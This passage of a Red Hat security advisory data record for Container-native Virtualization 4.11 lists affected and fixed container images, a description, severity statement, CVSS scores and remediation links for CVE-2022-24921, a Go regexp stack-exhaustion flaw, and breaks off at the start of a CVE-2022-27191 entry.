"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2064857", }, ], notes: [ { category: "description", text: "A stack overflow flaw was found in Golang's regexp module, which can crash the runtime if the application using regexp accepts very long or arbitrarily long regexps from untrusted sources that have sufficient nesting depths. To exploit this vulnerability, an attacker would need to send large regexps with deep nesting to the application. Triggering this flaw leads to a crash of the runtime, which causes a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "golang: regexp: stack exhaustion via a deeply nested expression", title: "Vulnerability summary", }, { category: "other", text: "This flaw has been rated as a Moderate impact flaw because the exploitation of this flaw requires that an affected application accept arbitrarily long regexps from untrusted sources, which has inherent risks (even without this flaw), especially involving impacts to application availability.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-400: Uncontrolled Resource Consumption vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nRed Hat restricts access to all platform information by default, granting access only after successful hard token-based multi-factor authentication (MFA) and enforcing least privilege to ensure only authorized roles can execute or modify code. The environment employs malicious code protections, including IDS/IPS and antimalware tools to detect threats and monitor resource usage, helping prevent uncontrolled consumption that could lead to system failure. Additional safeguards, such as web application firewalls and load-balancing strategies, protect against resource exhaustion and performance degradation. Event logs are centrally collected, correlated, and analyzed to support monitoring, alerting, and retention, aiding in the detection of abnormal behavior and potential denial-of-service (DoS) conditions. Static code analysis and peer reviews enforce strong input validation and error handling, reducing the likelihood of input-based DoS attacks.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-24921", }, { category: "external", summary: "RHBZ#2064857", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064857", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-24921", url: "https://www.cve.org/CVERecord?id=CVE-2022-24921", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-24921", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-24921", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/RP1hfrBYVuk", url: "https://groups.google.com/g/golang-announce/c/RP1hfrBYVuk", }, ], release_date: "2022-03-03T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: regexp: stack exhaustion via a deeply nested expression", }, { cve: "CVE-2022-27191", cwe: { id: "CWE-327", name: "Use of a Broken or Risky Cryptographic Algorithm", }, discovery_date: "2022-03-16T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2064702", }, ], notes: 